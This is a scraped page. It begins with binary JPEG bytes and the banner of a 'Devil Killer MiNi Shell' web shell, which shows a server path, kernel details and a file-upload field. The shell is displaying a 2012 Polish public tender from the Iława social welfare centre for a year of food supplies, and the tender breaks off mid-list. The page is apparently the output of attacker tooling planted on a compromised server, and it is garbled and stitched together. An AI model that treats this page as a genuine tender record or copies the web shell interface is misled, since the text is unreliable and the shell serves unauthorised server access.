JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121210/500186-N-2012.html

<p class="kh_header"><b>Iława: Dostawa artykułów spożywczych dla Miejskiego Ośrodka Pomocy Społecznej 
w Iławie na rok 2013</b><br>
<b>Numer ogłoszenia: 500186 - 2012; data zamieszczenia: 10.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Grunwaldzka 6a, 14-200 Iława, woj. warmińsko-mazurskie, tel. 089 6484124, faks 089 6499711.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa - ośrodek pomocy społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Miejskiego Ośrodka Pomocy Społecznej 
w Iławie na rok 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia 
Przedmiotem zamówienia publicznego jest dostawa artykułów spożywczych dla Miejskiego Ośrodka Pomocy Społecznej w Iławie na okres od 01 stycznia 2013 r. do 31 grudnia 2013 r. Przedmiot zamówienia obejmuje sprzedaż wraz z dostarczeniem przez Wykonawcę własnym transportem artykułów spożywczych do siedziby Zamawiającego, po uprzednim telefonicznym zamówieniu przez MOPS. Koszt transportu towaru oraz wniesienia go do pomieszczenia w budynku MOPS (wskazanego przez uprawnioną osobę) ponosi Wykonawca.
Przedmiot zamówienia został podzielony na 6 części  (z uwzględnieniem postanowień art. 32 ust. 4 ustawy Prawo Zamówień Publicznych):
Kod Wspólnego Słownika Zamówień CPV 15000000-8
Część 1 - artykuły spożywcze i napoje -  Kod CPV 15800000-6
Część 2 - nabiał - Kod CPV 15500000-3
Część 3 - pieczywo i ciasta - Kod CPV 15810000-9
Część 4 - ryby i przetwory rybne - Kod CPV 15200000-0
Część 5	 -  jaja - Kod CPV 03142500-3
Część 6 - mrożonki -  Kod CPV 15331170-9
Opis przedmiotu zamówienia zawiera szczegółowo załącznik nr 2a, 2b, 2c, 2d, 2e, 2f do SIWZ
Wszędzie, gdzie wskazane są jakiekolwiek znaki towarowe, nazwy etc. Zamawiający dopuszcza uwzględnienie innych produktów równoważnych, o parametrach nie gorszych niż wskazane w SIWZ.   
a) Wykonawca zobowiązuje się do Wykonania przedmiotu zamówienia zgodnie z formularzem ofertowym, wymogami obowiązującymi w przedmiocie zamówienia oraz o wysokiej jakości.
b) Uszczegółowienia przedmiotu konkretnej dostawy Zamawiający będzie dokonywał każdorazowo przy jej zamawianiu. Wartość dostawy będzie adekwatna do kosztu zamawianych każdorazowo artykułów, zgodnie z cenami  umownymi.
2. Miejscem wykonania zamówienia jest siedziba Miejskiego Ośrodka Pomocy Społecznej przy ulicy Grunwaldzkiej 6a, 14-200 Iława, zaś upoważnionym do odbioru Irena Czubak.
3. Wykonawca zobowiązany jest wypełnić w sposób szczegółowy załącznik nr  2 do SIWZ.
4. Wykonawca zobowiązany jest do dostarczania w ramach zawartej umowy artykułów spożywczych,  najlepszej jakości, wyprodukowanych zgodnie z obowiązującymi w tym przedmiocie normami; zgodnie z obowiązującymi przepisami prawnymi w tym zakresie.  
 5. Dostawa artykułów spożywczych odbywać się będzie okresowo, na podstawie telefonicznych zamówień MOPS dokonywanych do dwóch razy w tygodniu (część 4,6) lub trzech razy w tygodniu (część 1,2,3,5) najpóźniej dzień przed dostawą, w dniu i godzinie, a także w ilości i asortymencie wskazanych każdorazowo w zamówieniu telefonicznym.
6. Koszt transportu towaru oraz wniesienia go do pomieszczenia w budynku MOPS (wskazanego przez uprawnioną osobę) ponosi Wykonawca.
7. W razie stwierdzenia w toku czynności odbioru dostawy, jej obniżonej jakości, Zamawiający ma prawo nie przyjąć towaru i żądać jego wymiany, w terminie maksymalnie 2 godzin.
8. Zamawiający dopuszcza możliwość składania ofert częściowych na całość części 1 lub/i całość części 2 lub/i całość części 3 lub/i całość części 4 lub/i całość części 5 lub/i całość części 6.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.50.00.00-3, 15.81.00.00-9, 15.20.00.00-0, 03.14.25.00-3, 15.33.11.70-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 3 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dla uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 3</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie warunku posiadania do dyspozycji potencjału technicznego Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 3 do siwz, że dysponuje potencjałem technicznym do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dla uznania, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia zamawiający żąda, by wykonawca złożył oświadczenie o spełnianiu warunku, iż dysponuje osobami zdolnymi do wykonania zamówienia zgodnie z załącznikiem nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 3 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz ofertowy wypełniony i podpisany przez Wykonawcę - załącznik nr 1
2) formularz cenowy wypełniony i podpisany przez Wykonawcę - załącznik nr 2
3) w przypadku, gdy Wykonawcę reprezentuje pełnomocnik do oferty załączone musi być pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa,  która będzie podpisana w wyniku rozstrzygnięcia niniejszego postępowania o udzielenie zamówienia, będzie zawierała zapisy podane we wzorze umowy stanowiący załącznik nr 5  do niniejszej specyfikacji, z uwzględnieniem treści ofert.
2. Zmiana umowy w sprawie zamówienia publicznego co do zakresu zadania, ceny i terminu, może nastąpić na umotywowany pisemny wniosek jednej ze stron umowy po uzyskaniu zgody drugiej strony w formie aneksu z zachowaniem formy pisemnej w następujących przypadkach:
- zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą należy rozumieć zdarzenie zewnętrzne wobec łączącej strony więzi prawnej: o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, którego nie można uniknąć, ani któremu nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.
- zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron
- zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy 
- gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami, albo groziłoby wykonawcy rażącą stratą w rozumieniu art. 357 Kodeksu Cywilnego
3. Zamawiający zastrzega sobie możliwość zmniejszenia ilości przedmiotu umowy w każdym asortymencie i w każdej części zamówienia z prawem do proporcjonalnego zmniejszenia ceny. Wykonawcy nie przysługują w tej sytuacji żadne roszczenia wobec Zamawiającego. Warunkiem takiej zmiany będzie zmniejszenie ilości osób korzystających z obiadów w MOPS.
4. Zamawiający dopuszcza zwiększenie zakresu przedmiotu zamówienia w każdym asortymencie i w każdej części zamówienia, a tym samym proporcjonalne do zmiany zwiększenie wartości umowy. Warunkiem takiej zmiany będzie zwiększenie ilości osób korzystających z obiadów w MOPS.
5. Zamawiający zastrzega sobie możliwość rozszerzenia zakresu przedmiotu zamówienia w każdej z jego  części o produkty nie ujęte w SIWZ na skutek nieprzewidzenia potrzeby zakupu w chwili sporządzania SIWZ. Ceną jednostkową w tej sytuacji będzie cena jednostkowa produktu według ogólnie dostępnego cennika Wykonawcy. Zmiana tego typu wymaga sporządzenia pisemnego aneksu do umowy.   
6. W sytuacji, gdy z powodów niezależnych od Wykonawcy nie może on dostarczyć Zamawiającemu zamawianego przez niego artykułu,  Zamawiający może zamówić inny tego rodzaju produkt, wybrany przez siebie. Cena w tej sytuacji będzie zgodna z ogólnie przyjętym cennikiem Wykonawcy. Zmiany te będą dokonywane w drodze zamówień telefonicznych, do ich obowiązywania wystarczy ustne zamówienie przez Zamawiającego, reprezentowanego przez Irenę Czubak, i zgoda na jego dokonanie Wykonawcy. Poświadczeniem zamówienia będzie wystawiona faktura VAT. Zmiany tego typu nie wymagają formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.ilawa.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Iławie,  
Adres: 14-200 Iława, ul. Grunwaldzka 6a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2012 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Iławie, ul. Grunwaldzka 6a, 14-200 Iława
I piętro, sekretariat, pokój nr 113.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Cześć 1- artykuły spożywcze i napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas w puszce 500 ml	20	szt,
aromaty do ciast 10 ml	5	szt,
barszcz zupa w proszku dobrej jakości  200 g	150	szt,
Baton w czekoladzie 51 g 	335	szt,
baton w czekoladzie 47 g 	290	szt,
Brzoskwinie w puszce 850 g	30	szt,
budyń dobrej jakości 65 g 	1000	szt,
chipsy 85g	45	szt,
chrzan tarty 170 g	20	szt,
ciastka pierniki w czekoladzie 190 g	45	szt,
ciastka typu paluszki z galaretką w czekoladzie 170g	45	szt,
ciastka biszkopty z galaretką w czekoladzie 140g	45	szt,
ciastka w polewie czekoladowej z bakaliami 140g	45	szt,
ciastka w czekoladzie 1 kg (mogą być na wagę)	50	szt,
Cukier 1 kg	1300	szt,
cukier puder 0,5 kg	20	szt,
cukier waniliowy 32 g	500	szt,
cukierki czekoladowe wysokiej jakości 1 kg	150	szt,
Cynamon 100 g	50	szt,
czekolada gorzka wysokiej jakości100 g	50	szt,
czekolada mleczna wysokiej jakości 100 g	200	szt,
czekolada z białym nadzieniem mlecznym dla dzieci 100g	45	szt,
drożdże 0,1 kg	10	szt,
dżem (różne rodzaje) 280g	120	szt,
Fasola czerwona konserwowa 400 g	50	szt,
Fasolka szparagowa konserwowa 400 g	50	szt,
groszek konserwowy 400 g	200	szt,
grzyby suszone (borowiki) 20g	20	szt,
guma rozpuszczalna owocowa dla dzieci 125g	45	szt,
herbata granulowana wysokiej jakości 100 g	300	szt,
herbata liściasta wysokiej jakości 100 g	300	szt,
herbata zwykła 100 g	100	szt,
herbata expresowa czarna wysokiej jakości 100g	500	szt,
Herbatniki  100 g	100	szt,
kakao 200 g	30	szt,
kasza jęczmienna 1 kg	300	szt,
kasza manna 1 kg	300	szt,
kawa cappuccino różne smaki 150 g	30	szt,
kawa mielona wysokiej jakości 250 g	200	szt,
kawa mielona dobrej jakości  250g	200	szt,
kawa rozpuszczalna wysokiej jakości 200 g	30	szt,
kawa rozpuszczalna dobrej jakości 200 g	50	szt,
ketchup 1000g	30	szt,
ketchup 200 g	300	szt,
ketchup 380g	50	szt,
ketchup 500 g (plastikowe opak z możliwością wyciskania)	50	szt,
kisiel 65 g	500	szt,
koncentrat pomidorowy  970 g	150	szt,
krem czekoladowy 200 g	100	szt,
Kruche ciastka 1 kg (mogą być na wagę)	50	szt,
kukurydza konserwowa 340g	50	szt,
kwasek cytrynowy 20 g	1000	szt,
liść laurowy 7 g	150	szt,
lizak 8 g	300	szt,
majeranek 1 kg	15	szt,
majonez wysokiej jakości 460 g	120	szt,
majonez wysokiej jakości 600 g	130	szt,
makaron typu np. świderki 400g	1500	szt,
margaryna do pieczenia 250 g	200	szt,
marmolada 1 kg	100	szt,
marmolada 600 g	50	szt,
masa makowa 850 g	30	szt,
mąka typu luksusowa 1 kg	1300	szt,
mąka krupczatka 1 kg	10	szt,
mąka ziemniaczana 1 kg	20	szt,
mleko zagęszczone słodzone 533 g	20	szt,
musztarda 1 kg	10	szt,
musztarda 190 g	30	szt,
napój  2 l	150	szt,
Ocet 1 l	100	szt,
ogórki konserwowe 800 ml	100	szt,
olej z pierwszego tłoczenia  1 l	100	szt,
olej uniwersalny 1 l	1000	szt,
Oliwki zielone 305 ml	20	szt,
orzechy włoskie paczkowane 125 g	50	szt,
paluszki słone 300 g 	50	szt,
papryka konserwowa 680 g	20	szt,
Pieczarka konserwowa 300 g	20	szt,
pieprz czarny naturalny 500 g	100	szt,
pieprz czarny naturalny 20 g	50	szt,
Pieprz ziołowy 20 g	100	szt,
płatki kukurydziane 1 kg	50	szt,
Płatki migdałowe 100 g	30	szt,
polewa biała 100 g	20	szt,
polewa czekoladowa 100 g	20	szt,
posypka do ciast kolorowa 80 g	30	szt,
posypka do ciasta czekoladowa 80 g	20	szt,
proszek do pieczenia 30 g	150	szt,
przecier ogórkowy 350g	50	szt,
przyprawa do piernika 20 g	100	szt,
przyprawa sypka do potraw (dobrej jakości) 200 g	600	szt,
przyprawa do zup w płynie wysokiej jakości 860 g	500	szt,
przyprawa sypka składająca się z 11 dobranych warzyw i przypraw  200 g 	400	szt,
przyprawa uniwersalna kompozycja warzyw, ziół i przypraw 200 g 	300	szt,
przyprawa mieszanka przyprawowo-warzywna sypka wysokiej jakości 200g	300	szt,
przyprawa sypka do zup, sosów, potraw mięsnych i warzywnych, ryżu oraz makaronu 120 g	50	szt,
rodzynki 200 g	100	szt,
Ryż 1 kg	500	szt,
Seler konserwowy 320 ml	10	szt,
sok 1 l	200	szt,
sok 330 ml	100	szt,
sos sałatkowy 700 g	30	szt,
Sól 1 kg	500	szt,
syrop  420 ml	100	szt,
syrop 5 l	200	szt,
szczaw konserwowy 835 g	120	szt,
Śmietan. Mix - zagęstniacz 12 g	50	szt,
śnieżka bita śmietana 60 g	50	szt,
wafle 180 g	300	szt,
wiórki kokosowe 100 g	50	szt,
woda 0,5 l	500	szt,
ziele angielskie 40g	30	szt,
Żelatyna 20g	50	szt,
zupka chińska 70 g	100	szt,
soda oczyszczona 80 g	20	szt,
galaretka owocowa 90 g	100	szt,
śmietanka jednorazowa do kawy op.10 szt	100	opak,
mleko zagęszczone słodzone krówkowe 533g	20	szt,
kostka rosołowa 120g	100	szt,
kostka mięsna 120g	50	szt,
czosnek granulowany 80g	50	szt,
papryka słodka 20 g	50	szt,
papryka ostra 20 g	50	szt,
cury 100 g	100	szt,
gałka muszkatołowa mielona 15 g	50	szt,
pietruszka suszona 25 g	10	szt,
koper suszony 30 g	100	szt,
bazylia 30 g	100	szt,
żelki - cukierki 75g	45	szt,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cześć 2- nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt 125 ml owocowy	900	szt,
Masło ekstra 200 g	800	kos,
Mleko 2% 1 l	2000	litr,
serek topiony 100 g	150	szt,
ser żółty 1 kg	100	kg,
serek homogenizowany 135 g	150	szt,
śmietana 18% 0,2 l	100	szt,
śmietana 18% 375 ml	50	szt,
twaróg kostka 200 g	150	szt,
twaróg krojony 1 kg	300	kg,
śmietanka 36 1 l	20	szt,
śmietanka 30 1 l	1000	szt,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cześć 3 - pieczywo i ciasta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułki pszenne	3000	Szt,
chleb jasny 0,5 kg	1000	szt,
chleb razowy z ziarnami 0,4 kg	30	Szt,
drożdżówki	1000	Szt,
jabłecznik	50	Kg,
pączki	1000	Szt,
rogale półfrancuskie	20	Kg,
rolada makowa	50	Kg,
sernik marmurkowy	50	Kg,
bułka tarta 0,5 kg	500	szt,
Ciasto drożdżowe	30	kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Cześć 4 - ryby i przetwory rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Burger rybny	100	Kg,
kostka rybna	100	Kg,
paprykarz w puszce 300 g	50	Szt,
pasta rybna	20	Kg,
śledź matjas	300	Kg,
karp	50	Kg,
filet z morszczuka	200	Kg,
filet z mintaja	100	Kg,
płaty marynowane	100	kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Cześć 5 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja  L (od 63 g do 73g)	15000	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Cześć 6 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mrożonka ośmioskładnikowa 2,5 kg	
